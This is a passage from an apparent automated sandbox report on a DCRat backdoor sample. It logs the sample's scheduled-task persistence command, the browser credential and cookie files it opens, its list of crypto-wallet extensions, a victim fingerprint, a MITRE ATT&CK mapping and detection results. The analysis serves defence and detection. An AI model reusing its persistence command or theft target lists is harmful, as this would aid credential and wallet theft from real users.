                    Source: w32tm.exe, 00000017.00000002.1771137058.0000024516C47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process information queried: ProcessInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 16_2_00007FFD9B9414D0 rdtsc 16_2_00007FFD9B9414D0
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process token adjusted: Debug
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Process token adjusted: Debug
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Process token adjusted: Debug
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 10 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: services.exe, 00000010.00000002.2938691750.0000000002753000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [{"Files Count (8c96)":"0","Files Groups (8c96)":"N","Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"?","CC Count (1671)":"0","History Count (1671)":"15","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"?"},"5.0.4",1,1,"","user","610930","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\GameBarPresenceWriter","8HSE8CES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]5e425b57
                    Source: services.exe, 00000010.00000002.2938691750.000000000297D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: services.exe, 00000010.00000002.2938691750.000000000297D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002864000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [{"Files Count (8c96)":"0","Files Groups (8c96)":"N","Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"?","CC Count (1671)":"0","History Count (1671)":"15","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"?"},"5.0.4",1,1,"","user","610930","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\GameBarPresenceWriter","8HSE8CES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                    Source: services.exe, 00000010.00000002.2938691750.0000000002D27000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [{"Files Count (8c96)":"0","Files Groups (8c96)":"N","Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"?","CC Count (1671)":"0","History Count (1671)":"15","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"?"},"5.0.4",1,1,"","user","610930","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\GameBarPresenceWriter","8HSE8CES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York
                    Source: services.exe, 00000010.00000002.2938691750.0000000002D27000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager`
                    Source: services.exe, 00000010.00000002.2938691750.000000000297D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002B50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 8CES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Queries volume information: C:\Users\user\Desktop\Z4D3XAZ2jB.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Queries volume information: C:\Windows\GameBarPresenceWriter\services.exe VolumeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Queries volume information: C:\Windows\GameBarPresenceWriter\services.exe VolumeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Queries volume information: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Queries volume information: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe Queries volume information: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: services.exe, 00000010.00000002.3022554541.000000001CE96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Defender\MsMpeng.exe
                    Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\GameBarPresenceWriter\services.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\GameBarPresenceWriter\services.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    Source: Yara match File source: 00000010.00000002.2938691750.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000010.00000002.2938691750.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1721629037.0000000013120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Z4D3XAZ2jB.exe PID: 2004, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: services.exe PID: 2308, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: ZDtOzYsYYWKWEhNYzFc.exe PID: 7384, type: MEMORYSTR
                    Source: Yara match File source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1721629037.000000001272D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum
                    Source: services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\8
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1718398029.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"True","_2":"True","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"One directory"}}
                    Source: services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
                    Source: services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1721629037.000000001272D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                    Remote Access Functionality

                    Source: Yara match File source: 00000010.00000002.2938691750.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000010.00000002.2938691750.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1721629037.0000000013120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Z4D3XAZ2jB.exe PID: 2004, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: services.exe PID: 2308, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: ZDtOzYsYYWKWEhNYzFc.exe PID: 7384, type: MEMORYSTR
                    Source: Yara match File source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1721629037.000000001272D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scheduled Task/Job | 12 Process Injection | 232 Masquerading | 1 OS Credential Dumping | 351 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scripting | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 2 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 251 Virtualization/Sandbox Evasion | Security Account Manager | 251 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Clipboard Data | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | 1 DLL Side-Loading | 1 DLL Side-Loading | 12 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 134 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    [Behavior graph (image not reproduced): Behavior Graph ID: 1581018, Sample: Z4D3XAZ2jB.exe, Startdate: 26/12/2024, Architecture: WINDOWS, Score: 100. Contacted host shown in the graph: durok.ru, 104.21.93.162, CLOUDFLARENETUS, United States.]

                    Source | Detection | Scanner | Label | Link
                    Z4D3XAZ2jB.exe | 60% | Virustotal | | Browse
                    Z4D3XAZ2jB.exe | 63% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    Z4D3XAZ2jB.exe | 100% | Avira | TR/Dropper.Gen |
                    Z4D3XAZ2jB.exe | 100% | Joe Sandbox ML | |
                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\Desktop\fxzonGoL.log | 100% | Avira | HEUR/AGEN.1362695 |
                    C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe | 100% | Avira | TR/Dropper.Gen |
                    C:\Users\user\Desktop\dVPxoyeA.log | 100% | Avira | HEUR/AGEN.1300079 |
                    C:\Users\user\Desktop\OquQxqjY.log | 100% | Avira | HEUR/AGEN.1362695 |
                    C:\Users\user\Desktop\CNYkWNAB.log | 100% | Avira | TR/PSW.Agent.qngqt |
                    C:\Users\user\Desktop\YALoKruW.log | 100% | Avira | HEUR/AGEN.1300079 |
                    C:\Users\user\Desktop\RbOZahUq.log | 100% | Avira | HEUR/AGEN.1300079 |
                    C:\Users\user\Desktop\KInsUcJl.log | 100% | Avira | HEUR/AGEN.1300079 |
                    C:\Users\user\Desktop\NPGqEfku.log | 100% | Avira | TR/PSW.Agent.qngqt |
                    C:\Users\user\Desktop\MgNITBew.log | 100% | Avira | TR/Agent.jbwuj |
                    C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe | 100% | Avira | TR/Dropper.Gen |
                    C:\Users\user\Desktop\UAeHorhP.log | 100% | Avira | TR/Agent.jbwuj |
                    C:\Users\user\Desktop\MoHhbGed.log | 100% | Avira | TR/AVI.Agent.updqb |
                    C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat | 100% | Avira | BAT/Delbat.C |
                    C:\Users\user\Desktop\ZeYGhBeG.log | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\HtvJqEPI.log | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\fxzonGoL.log | 100% | Joe Sandbox ML | |
                    C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\dVPxoyeA.log | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\OquQxqjY.log | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\CNYkWNAB.log | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\YALoKruW.log | 100% | Joe Sandbox ML | |
